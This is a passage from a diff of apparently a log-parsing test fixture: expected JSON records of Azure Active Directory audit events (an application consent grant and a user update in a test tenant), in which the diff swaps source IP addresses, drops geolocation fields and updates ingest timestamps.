Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:06.0142481Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795893\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"821dc03c-4e38-4cd1-82b2-3155b41b4418\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -6951,25 +6339,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -6983,7 +6353,7 @@ "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -7122,7 +6492,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -7134,12 +6504,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036305500Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:06.0142481Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795893\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"821dc03c-4e38-4cd1-82b2-3155b41b4418\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125029500Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:06.0142481Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795893\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"821dc03c-4e38-4cd1-82b2-3155b41b4418\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -7302,7 +6672,7 @@ }, "client": {}, "event": { - "ingested": "2021-06-17T07:32:38.036311500Z", + "ingested": "2021-12-09T13:41:51.125033900Z", "original": "{\"Actor\":[{\"ID\":\"fim_password_service@support.onmicrosoft.com\",\"Type\":5},{\"ID\":\"100300008060F582\",\"Type\":3},{\"ID\":\"User_00000000-0000-0000-0000-000000000000\",\"Type\":2},{\"ID\":\"00000000-0000-0000-0000-000000000000\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"d51ef8df-6617-4356-b8d4-89ad7efef31e\",\"ActorIpAddress\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"\",\"CreationTime\":\"2020-02-10T15:15:04\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"d51ef8df-6617-4356-b8d4-89ad7efef31e\"},{\"Name\":\"actorObjectId\",\"Value\":\"00000000-0000-0000-0000-000000000000\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"fim_password_service@support.onmicrosoft.com\"},{\"Name\":\"actorPUID\",\"Value\":\"100300008060F582\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"targetPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"StrongAuthenticationPhoneAppDetail\\\",\\\"TargetId.UserType\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"4aa56c6c-8fa5-4787-a165-03f181541438\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"UserType\\\":\\\"Member\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:15:04.2043419Z\"},{\"Name\":\"env_epoch\",\"Value\":\"4QPHR\"},{\"Name\":\"env_seqNum\",\"Value\":\"87075075\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##00000000-0000-0000-0000-000000000000_00000000-0000-0000-0000-000000000000_00000000-0000-0000-0000-000000000000\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"becwebservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"becwebservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RBWSR554\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"83c924c1-f2e2-4b39-8eda-b80c3823a875\",\"ModifiedProperties\":[{\"Name\":\"StrongAuthenticationPhoneAppDetail\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"DeviceName\\\": \\\"NO_DEVICE\\\",\\r\\n \\\"DeviceToken\\\": \\\"NO_DEVICE_TOKEN\\\",\\r\\n \\\"DeviceTag\\\": \\\"SoftwareTokenActivated\\\",\\r\\n \\\"PhoneAppVersion\\\": \\\"NO_PHONE_APP_VERSION\\\",\\r\\n \\\"OathTokenTimeDrift\\\": -1,\\r\\n \\\"DeviceId\\\": null,\\r\\n \\\"Id\\\": \\\"3b539b10-3846-4f9b-877d-55b0b8e76147\\\",\\r\\n \\\"TimeInterval\\\": null,\\r\\n \\\"AuthenticationType\\\": 2,\\r\\n \\\"NotificationType\\\": 1,\\r\\n \\\"SecuredPartitionId\\\": 0,\\r\\n \\\"SecuredKeyId\\\": 0\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"DeviceName\\\": \\\"NO_DEVICE\\\",\\r\\n \\\"DeviceToken\\\": \\\"NO_DEVICE_TOKEN\\\",\\r\\n \\\"DeviceTag\\\": \\\"SoftwareTokenActivated\\\",\\r\\n \\\"PhoneAppVersion\\\": \\\"NO_PHONE_APP_VERSION\\\",\\r\\n \\\"OathTokenTimeDrift\\\": 0,\\r\\n \\\"DeviceId\\\": null,\\r\\n \\\"Id\\\": \\\"3b539b10-3846-4f9b-877d-55b0b8e76147\\\",\\r\\n \\\"TimeInterval\\\": null,\\r\\n \\\"AuthenticationType\\\": 2,\\r\\n \\\"NotificationType\\\": 1,\\r\\n \\\"SecuredPartitionId\\\": 0,\\r\\n \\\"SecuredKeyId\\\": 0\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"StrongAuthenticationPhoneAppDetail\",\"OldValue\":\"\"},{\"Name\":\"TargetId.UserType\",\"NewValue\":\"Member\",\"OldValue\":\"\"}],\"ObjectId\":\"asr@testsiem.onmicrosoft.com\",\"Operation\":\"Update user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"fim_password_service@support.onmicrosoft.com\",\"UserKey\":\"100300008060F582@support.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -7335,25 +6705,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -7367,7 +6719,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -7503,7 +6855,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -7515,12 +6867,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036317200Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 